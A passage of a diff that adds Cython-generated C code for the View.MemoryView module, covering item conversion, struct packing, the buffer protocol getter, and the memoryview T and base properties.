__Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + } + __pyx_v_result = __pyx_t_1; + __pyx_t_1 = 0; + + /* "View.MemoryView":496 + * + * bytesitem = itemp[:self.view.itemsize] + * try: # <<<<<<<<<<<<<< + * result = struct.unpack(self.view.format, bytesitem) + * except struct.error: + */ + } + + /* "View.MemoryView":501 + * raise ValueError, "Unable to convert item to object" + * else: + * if len(self.view.format) == 1: # <<<<<<<<<<<<<< + * return result[0] + * return result + */ + /*else:*/ { + __pyx_t_9 = __Pyx_ssize_strlen(__pyx_v_self->view.format); if (unlikely(__pyx_t_9 == ((Py_ssize_t)-1))) __PYX_ERR(1, 501, __pyx_L5_except_error) + __pyx_t_10 = (__pyx_t_9 == 1); + if (__pyx_t_10) { + + /* "View.MemoryView":502 + * else: + * if len(self.view.format) == 1: + * return result[0] # <<<<<<<<<<<<<< + * return result + * + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_GetItemInt(__pyx_v_result, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 502, __pyx_L5_except_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L6_except_return; + + /* "View.MemoryView":501 + * raise ValueError, "Unable to convert item to object" + * else: + * if len(self.view.format) == 1: # <<<<<<<<<<<<<< + * return result[0] + * return result + */ + } + + /* "View.MemoryView":503 + * if len(self.view.format) == 1: + * return result[0] + * return result # <<<<<<<<<<<<<< + * + * cdef assign_item_from_object(self, char *itemp, object value): + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF(__pyx_v_result); + __pyx_r = __pyx_v_result; + goto __pyx_L6_except_return; + } + __pyx_L3_error:; + __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_XDECREF(__pyx_t_5); __pyx_t_5 = 0; + __Pyx_XDECREF(__pyx_t_6); __pyx_t_6 = 0; + __Pyx_XDECREF(__pyx_t_7); __pyx_t_7 = 0; + + /* "View.MemoryView":498 + * try: + * result = struct.unpack(self.view.format, bytesitem) + * except struct.error: # <<<<<<<<<<<<<< + * raise ValueError, "Unable to convert item to object" + * else: + */ + __Pyx_ErrFetch(&__pyx_t_1, &__pyx_t_5, &__pyx_t_6); + __pyx_t_7 = __Pyx_PyObject_GetAttrStr(__pyx_v_struct, __pyx_n_s_error); if (unlikely(!__pyx_t_7)) __PYX_ERR(1, 498, __pyx_L5_except_error) + __Pyx_GOTREF(__pyx_t_7); + __pyx_t_8 = __Pyx_PyErr_GivenExceptionMatches(__pyx_t_1, __pyx_t_7); + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + __Pyx_ErrRestore(__pyx_t_1, __pyx_t_5, __pyx_t_6); + __pyx_t_1 = 0; __pyx_t_5 = 0; __pyx_t_6 = 0; + if (__pyx_t_8) { + __Pyx_AddTraceback("View.MemoryView.memoryview.convert_item_to_object", __pyx_clineno, __pyx_lineno, __pyx_filename); + if (__Pyx_GetException(&__pyx_t_6, &__pyx_t_5, &__pyx_t_1) < 0) __PYX_ERR(1, 498, __pyx_L5_except_error) + __Pyx_XGOTREF(__pyx_t_6); + __Pyx_XGOTREF(__pyx_t_5); + __Pyx_XGOTREF(__pyx_t_1); + + /* "View.MemoryView":499 + * result = struct.unpack(self.view.format, bytesitem) + * except struct.error: + * raise ValueError, "Unable to convert item to object" # <<<<<<<<<<<<<< + * else: + * if len(self.view.format) == 1: + */ + __Pyx_Raise(__pyx_builtin_ValueError, __pyx_kp_s_Unable_to_convert_item_to_object, 0, 0); + __PYX_ERR(1, 499, __pyx_L5_except_error) + } + goto __pyx_L5_except_error; + + /* "View.MemoryView":496 + * + * bytesitem = itemp[:self.view.itemsize] + * try: # <<<<<<<<<<<<<< + * result = struct.unpack(self.view.format, bytesitem) + * except struct.error: + */ + __pyx_L5_except_error:; + __Pyx_XGIVEREF(__pyx_t_2); + __Pyx_XGIVEREF(__pyx_t_3); + __Pyx_XGIVEREF(__pyx_t_4); + __Pyx_ExceptionReset(__pyx_t_2, __pyx_t_3, __pyx_t_4); + goto __pyx_L1_error; + __pyx_L6_except_return:; + __Pyx_XGIVEREF(__pyx_t_2); + __Pyx_XGIVEREF(__pyx_t_3); + __Pyx_XGIVEREF(__pyx_t_4); + __Pyx_ExceptionReset(__pyx_t_2, __pyx_t_3, __pyx_t_4); + goto __pyx_L0; + } + + /* "View.MemoryView":489 + * self.assign_item_from_object(itemp, value) + * + * cdef convert_item_to_object(self, char *itemp): # <<<<<<<<<<<<<< + * """Only used if instantiated manually by the user, or if Cython doesn't + * know how to convert the type""" + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_5); + __Pyx_XDECREF(__pyx_t_6); + __Pyx_XDECREF(__pyx_t_7); + __Pyx_AddTraceback("View.MemoryView.memoryview.convert_item_to_object", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XDECREF(__pyx_v_struct); + __Pyx_XDECREF(__pyx_v_bytesitem); + __Pyx_XDECREF(__pyx_v_result); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":505 + * return result + * + * cdef assign_item_from_object(self, char *itemp, object value): # <<<<<<<<<<<<<< + * """Only used if instantiated manually by the user, or if Cython doesn't + * know how to convert the type""" + */ + +static PyObject *__pyx_memoryview_assign_item_from_object(struct __pyx_memoryview_obj *__pyx_v_self, char *__pyx_v_itemp, PyObject *__pyx_v_value) { + PyObject *__pyx_v_struct = NULL; + char __pyx_v_c; + PyObject *__pyx_v_bytesvalue = 0; + Py_ssize_t __pyx_v_i; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_t_2; + PyObject *__pyx_t_3 = NULL; + PyObject *__pyx_t_4 = NULL; + PyObject *__pyx_t_5 = NULL; + int __pyx_t_6; + Py_ssize_t __pyx_t_7; + PyObject *__pyx_t_8 = NULL; + char *__pyx_t_9; + char *__pyx_t_10; + char *__pyx_t_11; + char *__pyx_t_12; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("assign_item_from_object", 0); + + /* "View.MemoryView":508 + * """Only used if instantiated manually by the user, or if Cython doesn't + * know how to convert the type""" + * import struct # <<<<<<<<<<<<<< + * cdef char c + * cdef bytes bytesvalue + */ + __pyx_t_1 = __Pyx_ImportDottedModule(__pyx_n_s_struct, NULL); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 508, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_v_struct = __pyx_t_1; + __pyx_t_1 = 0; + + /* "View.MemoryView":513 + * cdef Py_ssize_t i + * + * if isinstance(value, tuple): # <<<<<<<<<<<<<< + * bytesvalue = struct.pack(self.view.format, *value) + * else: + */ + __pyx_t_2 = PyTuple_Check(__pyx_v_value); + if (__pyx_t_2) { + + /* "View.MemoryView":514 + * + * if isinstance(value, tuple): + * bytesvalue = struct.pack(self.view.format, *value) # <<<<<<<<<<<<<< + * else: + * bytesvalue = struct.pack(self.view.format, value) + */ + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(__pyx_v_struct, __pyx_n_s_pack); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 514, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_3 = __Pyx_PyBytes_FromString(__pyx_v_self->view.format); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 514, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_4 = PyTuple_New(1); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 514, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_GIVEREF(__pyx_t_3); + PyTuple_SET_ITEM(__pyx_t_4, 0, __pyx_t_3); + __pyx_t_3 = 0; + __pyx_t_3 = __Pyx_PySequence_Tuple(__pyx_v_value); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 514, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_5 = PyNumber_Add(__pyx_t_4, __pyx_t_3); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 514, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __pyx_t_3 = __Pyx_PyObject_Call(__pyx_t_1, __pyx_t_5, NULL); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 514, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + if (!(likely(PyBytes_CheckExact(__pyx_t_3))||((__pyx_t_3) == Py_None) || __Pyx_RaiseUnexpectedTypeError("bytes", __pyx_t_3))) __PYX_ERR(1, 514, __pyx_L1_error) + __pyx_v_bytesvalue = ((PyObject*)__pyx_t_3); + __pyx_t_3 = 0; + + /* "View.MemoryView":513 + * cdef Py_ssize_t i + * + * if isinstance(value, tuple): # <<<<<<<<<<<<<< + * bytesvalue = struct.pack(self.view.format, *value) + * else: + */ + goto __pyx_L3; + } + + /* "View.MemoryView":516 + * bytesvalue = struct.pack(self.view.format, *value) + * else: + * bytesvalue = struct.pack(self.view.format, value) # <<<<<<<<<<<<<< + * + * for i, c in enumerate(bytesvalue): + */ + /*else*/ { + __pyx_t_5 = __Pyx_PyObject_GetAttrStr(__pyx_v_struct, __pyx_n_s_pack); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 516, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_1 = __Pyx_PyBytes_FromString(__pyx_v_self->view.format); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 516, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_4 = NULL; + __pyx_t_6 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_5))) { + __pyx_t_4 = PyMethod_GET_SELF(__pyx_t_5); + if (likely(__pyx_t_4)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_5); + __Pyx_INCREF(__pyx_t_4); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_5, function); + __pyx_t_6 = 1; + } + } + { + PyObject *__pyx_callargs[3] = {__pyx_t_4, __pyx_t_1, __pyx_v_value}; + __pyx_t_3 = __Pyx_PyObject_FastCall(__pyx_t_5, __pyx_callargs+1-__pyx_t_6, 2+__pyx_t_6); + __Pyx_XDECREF(__pyx_t_4); __pyx_t_4 = 0; + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 516, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + } + if (!(likely(PyBytes_CheckExact(__pyx_t_3))||((__pyx_t_3) == Py_None) || __Pyx_RaiseUnexpectedTypeError("bytes", __pyx_t_3))) __PYX_ERR(1, 516, __pyx_L1_error) + __pyx_v_bytesvalue = ((PyObject*)__pyx_t_3); + __pyx_t_3 = 0; + } + __pyx_L3:; + + /* "View.MemoryView":518 + * bytesvalue = struct.pack(self.view.format, value) + * + * for i, c in enumerate(bytesvalue): # <<<<<<<<<<<<<< + * itemp[i] = c + * + */ + __pyx_t_7 = 0; + if (unlikely(__pyx_v_bytesvalue == Py_None)) { + PyErr_SetString(PyExc_TypeError, "'NoneType' is not iterable"); + __PYX_ERR(1, 518, __pyx_L1_error) + } + __Pyx_INCREF(__pyx_v_bytesvalue); + __pyx_t_8 = __pyx_v_bytesvalue; + __pyx_t_10 = PyBytes_AS_STRING(__pyx_t_8); + __pyx_t_11 = (__pyx_t_10 + PyBytes_GET_SIZE(__pyx_t_8)); + for (__pyx_t_12 = __pyx_t_10; __pyx_t_12 < __pyx_t_11; __pyx_t_12++) { + __pyx_t_9 = __pyx_t_12; + __pyx_v_c = (__pyx_t_9[0]); + + /* "View.MemoryView":519 + * + * for i, c in enumerate(bytesvalue): + * itemp[i] = c # <<<<<<<<<<<<<< + * + * @cname('getbuffer') + */ + __pyx_v_i = __pyx_t_7; + + /* "View.MemoryView":518 + * bytesvalue = struct.pack(self.view.format, value) + * + * for i, c in enumerate(bytesvalue): # <<<<<<<<<<<<<< + * itemp[i] = c + * + */ + __pyx_t_7 = (__pyx_t_7 + 1); + + /* "View.MemoryView":519 + * + * for i, c in enumerate(bytesvalue): + * itemp[i] = c # <<<<<<<<<<<<<< + * + * @cname('getbuffer') + */ + (__pyx_v_itemp[__pyx_v_i]) = __pyx_v_c; + } + __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; + + /* "View.MemoryView":505 + * return result + * + * cdef assign_item_from_object(self, char *itemp, object value): # <<<<<<<<<<<<<< + * """Only used if instantiated manually by the user, or if Cython doesn't + * know how to convert the type""" + */ + + /* function exit code */ + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_XDECREF(__pyx_t_4); + __Pyx_XDECREF(__pyx_t_5); + __Pyx_XDECREF(__pyx_t_8); + __Pyx_AddTraceback("View.MemoryView.memoryview.assign_item_from_object", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XDECREF(__pyx_v_struct); + __Pyx_XDECREF(__pyx_v_bytesvalue); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":521 + * itemp[i] = c + * + * @cname('getbuffer') # <<<<<<<<<<<<<< + * def __getbuffer__(self, Py_buffer *info, int flags): + * if flags & PyBUF_WRITABLE and self.view.readonly: + */ + +/* Python wrapper */ +CYTHON_UNUSED static int __pyx_memoryview_getbuffer(PyObject *__pyx_v_self, Py_buffer *__pyx_v_info, int __pyx_v_flags); /*proto*/ +CYTHON_UNUSED static int __pyx_memoryview_getbuffer(PyObject *__pyx_v_self, Py_buffer *__pyx_v_info, int __pyx_v_flags) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + int __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__getbuffer__ (wrapper)", 0); + __pyx_r = __pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_8__getbuffer__(((struct __pyx_memoryview_obj *)__pyx_v_self), ((Py_buffer *)__pyx_v_info), ((int)__pyx_v_flags)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static int __pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_8__getbuffer__(struct __pyx_memoryview_obj *__pyx_v_self, Py_buffer *__pyx_v_info, int __pyx_v_flags) { + int __pyx_r; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + int __pyx_t_2; + Py_ssize_t *__pyx_t_3; + char *__pyx_t_4; + void *__pyx_t_5; + int __pyx_t_6; + Py_ssize_t __pyx_t_7; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + if (unlikely(__pyx_v_info == NULL)) { + PyErr_SetString(PyExc_BufferError, "PyObject_GetBuffer: view==NULL argument is obsolete"); + return -1; + } + __Pyx_RefNannySetupContext("__getbuffer__", 0); + __pyx_v_info->obj = Py_None; __Pyx_INCREF(Py_None); + __Pyx_GIVEREF(__pyx_v_info->obj); + + /* "View.MemoryView":523 + * @cname('getbuffer') + * def __getbuffer__(self, Py_buffer *info, int flags): + * if flags & PyBUF_WRITABLE and self.view.readonly: # <<<<<<<<<<<<<< + * raise ValueError, "Cannot create writable memory view from read-only memoryview" + * + */ + __pyx_t_2 = ((__pyx_v_flags & PyBUF_WRITABLE) != 0); + if (__pyx_t_2) { + } else { + __pyx_t_1 = __pyx_t_2; + goto __pyx_L4_bool_binop_done; + } + __pyx_t_1 = __pyx_v_self->view.readonly; + __pyx_L4_bool_binop_done:; + if (unlikely(__pyx_t_1)) { + + /* "View.MemoryView":524 + * def __getbuffer__(self, Py_buffer *info, int flags): + * if flags & PyBUF_WRITABLE and self.view.readonly: + * raise ValueError, "Cannot create writable memory view from read-only memoryview" # <<<<<<<<<<<<<< + * + * if flags & PyBUF_ND: + */ + __Pyx_Raise(__pyx_builtin_ValueError, __pyx_kp_s_Cannot_create_writable_memory_vi, 0, 0); + __PYX_ERR(1, 524, __pyx_L1_error) + + /* "View.MemoryView":523 + * @cname('getbuffer') + * def __getbuffer__(self, Py_buffer *info, int flags): + * if flags & PyBUF_WRITABLE and self.view.readonly: # <<<<<<<<<<<<<< + * raise ValueError, "Cannot create writable memory view from read-only memoryview" + * + */ + } + + /* "View.MemoryView":526 + * raise ValueError, "Cannot create writable memory view from read-only memoryview" + * + * if flags & PyBUF_ND: # <<<<<<<<<<<<<< + * info.shape = self.view.shape + * else: + */ + __pyx_t_1 = ((__pyx_v_flags & PyBUF_ND) != 0); + if (__pyx_t_1) { + + /* "View.MemoryView":527 + * + * if flags & PyBUF_ND: + * info.shape = self.view.shape # <<<<<<<<<<<<<< + * else: + * info.shape = NULL + */ + __pyx_t_3 = __pyx_v_self->view.shape; + __pyx_v_info->shape = __pyx_t_3; + + /* "View.MemoryView":526 + * raise ValueError, "Cannot create writable memory view from read-only memoryview" + * + * if flags & PyBUF_ND: # <<<<<<<<<<<<<< + * info.shape = self.view.shape + * else: + */ + goto __pyx_L6; + } + + /* "View.MemoryView":529 + * info.shape = self.view.shape + * else: + * info.shape = NULL # <<<<<<<<<<<<<< + * + * if flags & PyBUF_STRIDES: + */ + /*else*/ { + __pyx_v_info->shape = NULL; + } + __pyx_L6:; + + /* "View.MemoryView":531 + * info.shape = NULL + * + * if flags & PyBUF_STRIDES: # <<<<<<<<<<<<<< + * info.strides = self.view.strides + * else: + */ + __pyx_t_1 = ((__pyx_v_flags & PyBUF_STRIDES) != 0); + if (__pyx_t_1) { + + /* "View.MemoryView":532 + * + * if flags & PyBUF_STRIDES: + * info.strides = self.view.strides # <<<<<<<<<<<<<< + * else: + * info.strides = NULL + */ + __pyx_t_3 = __pyx_v_self->view.strides; + __pyx_v_info->strides = __pyx_t_3; + + /* "View.MemoryView":531 + * info.shape = NULL + * + * if flags & PyBUF_STRIDES: # <<<<<<<<<<<<<< + * info.strides = self.view.strides + * else: + */ + goto __pyx_L7; + } + + /* "View.MemoryView":534 + * info.strides = self.view.strides + * else: + * info.strides = NULL # <<<<<<<<<<<<<< + * + * if flags & PyBUF_INDIRECT: + */ + /*else*/ { + __pyx_v_info->strides = NULL; + } + __pyx_L7:; + + /* "View.MemoryView":536 + * info.strides = NULL + * + * if flags & PyBUF_INDIRECT: # <<<<<<<<<<<<<< + * info.suboffsets = self.view.suboffsets + * else: + */ + __pyx_t_1 = ((__pyx_v_flags & PyBUF_INDIRECT) != 0); + if (__pyx_t_1) { + + /* "View.MemoryView":537 + * + * if flags & PyBUF_INDIRECT: + * info.suboffsets = self.view.suboffsets # <<<<<<<<<<<<<< + * else: + * info.suboffsets = NULL + */ + __pyx_t_3 = __pyx_v_self->view.suboffsets; + __pyx_v_info->suboffsets = __pyx_t_3; + + /* "View.MemoryView":536 + * info.strides = NULL + * + * if flags & PyBUF_INDIRECT: # <<<<<<<<<<<<<< + * info.suboffsets = self.view.suboffsets + * else: + */ + goto __pyx_L8; + } + + /* "View.MemoryView":539 + * info.suboffsets = self.view.suboffsets + * else: + * info.suboffsets = NULL # <<<<<<<<<<<<<< + * + * if flags & PyBUF_FORMAT: + */ + /*else*/ { + __pyx_v_info->suboffsets = NULL; + } + __pyx_L8:; + + /* "View.MemoryView":541 + * info.suboffsets = NULL + * + * if flags & PyBUF_FORMAT: # <<<<<<<<<<<<<< + * info.format = self.view.format + * else: + */ + __pyx_t_1 = ((__pyx_v_flags & PyBUF_FORMAT) != 0); + if (__pyx_t_1) { + + /* "View.MemoryView":542 + * + * if flags & PyBUF_FORMAT: + * info.format = self.view.format # <<<<<<<<<<<<<< + * else: + * info.format = NULL + */ + __pyx_t_4 = __pyx_v_self->view.format; + __pyx_v_info->format = __pyx_t_4; + + /* "View.MemoryView":541 + * info.suboffsets = NULL + * + * if flags & PyBUF_FORMAT: # <<<<<<<<<<<<<< + * info.format = self.view.format + * else: + */ + goto __pyx_L9; + } + + /* "View.MemoryView":544 + * info.format = self.view.format + * else: + * info.format = NULL # <<<<<<<<<<<<<< + * + * info.buf = self.view.buf + */ + /*else*/ { + __pyx_v_info->format = NULL; + } + __pyx_L9:; + + /* "View.MemoryView":546 + * info.format = NULL + * + * info.buf = self.view.buf # <<<<<<<<<<<<<< + * info.ndim = self.view.ndim + * info.itemsize = self.view.itemsize + */ + __pyx_t_5 = __pyx_v_self->view.buf; + __pyx_v_info->buf = __pyx_t_5; + + /* "View.MemoryView":547 + * + * info.buf = self.view.buf + * info.ndim = self.view.ndim # <<<<<<<<<<<<<< + * info.itemsize = self.view.itemsize + * info.len = self.view.len + */ + __pyx_t_6 = __pyx_v_self->view.ndim; + __pyx_v_info->ndim = __pyx_t_6; + + /* "View.MemoryView":548 + * info.buf = self.view.buf + * info.ndim = self.view.ndim + * info.itemsize = self.view.itemsize # <<<<<<<<<<<<<< + * info.len = self.view.len + * info.readonly = self.view.readonly + */ + __pyx_t_7 = __pyx_v_self->view.itemsize; + __pyx_v_info->itemsize = __pyx_t_7; + + /* "View.MemoryView":549 + * info.ndim = self.view.ndim + * info.itemsize = self.view.itemsize + * info.len = self.view.len # <<<<<<<<<<<<<< + * info.readonly = self.view.readonly + * info.obj = self + */ + __pyx_t_7 = __pyx_v_self->view.len; + __pyx_v_info->len = __pyx_t_7; + + /* "View.MemoryView":550 + * info.itemsize = self.view.itemsize + * info.len = self.view.len + * info.readonly = self.view.readonly # <<<<<<<<<<<<<< + * info.obj = self + * + */ + __pyx_t_1 = __pyx_v_self->view.readonly; + __pyx_v_info->readonly = __pyx_t_1; + + /* "View.MemoryView":551 + * info.len = self.view.len + * info.readonly = self.view.readonly + * info.obj = self # <<<<<<<<<<<<<< + * + * + */ + __Pyx_INCREF((PyObject *)__pyx_v_self); + __Pyx_GIVEREF((PyObject *)__pyx_v_self); + __Pyx_GOTREF(__pyx_v_info->obj); + __Pyx_DECREF(__pyx_v_info->obj); + __pyx_v_info->obj = ((PyObject *)__pyx_v_self); + + /* "View.MemoryView":521 + * itemp[i] = c + * + * @cname('getbuffer') # <<<<<<<<<<<<<< + * def __getbuffer__(self, Py_buffer *info, int flags): + * if flags & PyBUF_WRITABLE and self.view.readonly: + */ + + /* function exit code */ + __pyx_r = 0; + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_AddTraceback("View.MemoryView.memoryview.__getbuffer__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + if (__pyx_v_info->obj != NULL) { + __Pyx_GOTREF(__pyx_v_info->obj); + __Pyx_DECREF(__pyx_v_info->obj); __pyx_v_info->obj = 0; + } + goto __pyx_L2; + __pyx_L0:; + if (__pyx_v_info->obj == Py_None) { + __Pyx_GOTREF(__pyx_v_info->obj); + __Pyx_DECREF(__pyx_v_info->obj); __pyx_v_info->obj = 0; + } + __pyx_L2:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":554 + * + * + * @property # <<<<<<<<<<<<<< + * def T(self): + * cdef _memoryviewslice result = memoryview_copy(self) + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15View_dot_MemoryView_10memoryview_1T_1__get__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_pw_15View_dot_MemoryView_10memoryview_1T_1__get__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__ (wrapper)", 0); + __pyx_r = __pyx_pf_15View_dot_MemoryView_10memoryview_1T___get__(((struct __pyx_memoryview_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_15View_dot_MemoryView_10memoryview_1T___get__(struct __pyx_memoryview_obj *__pyx_v_self) { + struct __pyx_memoryviewslice_obj *__pyx_v_result = 0; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_t_2; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__get__", 0); + + /* "View.MemoryView":556 + * @property + * def T(self): + * cdef _memoryviewslice result = memoryview_copy(self) # <<<<<<<<<<<<<< + * transpose_memslice(&result.from_slice) + * return result + */ + __pyx_t_1 = __pyx_memoryview_copy_object(__pyx_v_self); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 556, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + if (!(likely(((__pyx_t_1) == Py_None) || likely(__Pyx_TypeTest(__pyx_t_1, __pyx_memoryviewslice_type))))) __PYX_ERR(1, 556, __pyx_L1_error) + __pyx_v_result = ((struct __pyx_memoryviewslice_obj *)__pyx_t_1); + __pyx_t_1 = 0; + + /* "View.MemoryView":557 + * def T(self): + * cdef _memoryviewslice result = memoryview_copy(self) + * transpose_memslice(&result.from_slice) # <<<<<<<<<<<<<< + * return result + * + */ + __pyx_t_2 = __pyx_memslice_transpose((&__pyx_v_result->from_slice)); if (unlikely(__pyx_t_2 == ((int)-1))) __PYX_ERR(1, 557, __pyx_L1_error) + + /* "View.MemoryView":558 + * cdef _memoryviewslice result = memoryview_copy(self) + * transpose_memslice(&result.from_slice) + * return result # <<<<<<<<<<<<<< + * + * @property + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF((PyObject *)__pyx_v_result); + __pyx_r = ((PyObject *)__pyx_v_result); + goto __pyx_L0; + + /* "View.MemoryView":554 + * + * + * @property # <<<<<<<<<<<<<< + * def T(self): + * cdef _memoryviewslice result = memoryview_copy(self) + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("View.MemoryView.memoryview.T.__get__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XDECREF((PyObject *)__pyx_v_result); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":560 + * return result + * + * @property # <<<<<<<<<<<<<< + * def base(self): + * return self._get_base() + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15View_dot_MemoryView_10memoryview_4base_1__get__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_pw_15View_dot_MemoryView_10memoryview_4base_1__get__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__ (wrapper)", 0); + __pyx_r = __pyx_pf_15View_dot_MemoryView_10memoryview_4base___get__(((struct __pyx_memoryview_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_15View_dot_MemoryView_10memoryview_4base___get__(struct __pyx_memoryview_obj *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__get__", 0); + + /* "View.MemoryView":562 + * @property + * def base(self): + * return self._get_base() # <<<<<<<<<<<<<< + * + * cdef _get_base(self): + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = ((struct __pyx_vtabstruct_memoryview *)__pyx_v_self->__pyx_vtab)->_get_base(__pyx_v_self); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 562, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "View.MemoryView":560 + * return result + * + * @property # <<<<<<<<<<<<<< + * def base(self): + * return self._get_base() + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("View.MemoryView.memoryview.base.__get__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":564 + * return self._get_base() + * + * cdef _get_base(self): # <<<<<<<<<<<<<< + * return self.obj + * + */ + +static PyObject *__pyx_memoryview__get_base(struct __pyx_memoryview_obj *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("_get_base", 0); + + /* "View.MemoryView":565 + * + * cdef _get_base(self): + * return self.obj # <<<<<<<<<<<<<< + * + * @property + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF(__pyx_v_self->obj); + __pyx_r = __pyx_v_self->obj; + goto __pyx_L0; 